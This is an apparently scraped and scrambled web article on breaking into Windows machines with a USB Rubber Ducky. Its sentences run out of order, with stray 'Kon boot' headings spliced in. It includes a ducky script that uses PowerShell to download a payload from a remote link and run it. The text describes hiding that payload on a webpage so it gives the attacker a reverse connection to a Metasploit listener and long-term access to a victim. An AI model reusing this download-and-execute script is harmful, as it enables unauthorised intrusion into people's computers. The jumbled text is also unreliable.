This will give a reverse TCP or HTTP connection according to your payload of choice.
Kon boot official website code#
This will run the code for you and it is really fast it completes its task in seconds. In place of DOWNLOAD LINK add your payload download link and in place of PAYLOAD NAME give your payload name. STRING powershell ( new-object ).DownloadFile( 'DOWNLOAD LINK') Start-Process "%TEMP%\PAYLOAD NAME" REM Description: Opens Run menu, throws power shell string, enter. REM Title: Powershell Wget & Execute Author: Mubix Version: 1.2
Here is a simple ducky script that does the work for you. Load ducky script and configure it to download and run the file from the server: I have a raspberry pi in my workstation that works 24/7 with really good internet with another system running the hacker machine in another raspberry pi which I have a connection with a highly secure SSH connection from which I monitor and listen from the target. So I have done loading it into my website and I have gained the link to it. Load the windows payload into the website:
Kon boot official website .exe#
exe or the payload which I configured that gives me a reverse connection to my hacker system. I have my personal webpage and I have hidden an Inaccessible part of the page where I have stored the. I suggest you place the file in a remote location on some webpage and provide the direct download link to the rubber ducky to do the job. You need to consider that you don't know when the victim will download the file and run it so for that. Load ducky script and configure it to download and run the file from the server.Load the windows payload into the website.Payload injection is a common practice in hacking when a hacker gets into your system he tends to create a long-term connection with the system.įor that he needs to inject a payload into the system in this case we can use the famous Rubber Ducky and the ducky script and a server with Metasploit to do this. Speed and effectiveness of Bash Bunny and Rubber Ducky.Previous Windows vulnerability and CVE's.It is a system preferred by common people as it is easy to use and comes with a wide range of products and games for gamers and common people. Windows is the most commonly used operating system in the market and nearly 90% of us use windows in our day-to-day life.
In this article, we are looking into the most effective and the most interesting ways that you or a hacker can hack into a Windows machine and we are going to cover topics related to the hardware, software, CVE's and all the ways you can set up them to run it successfully.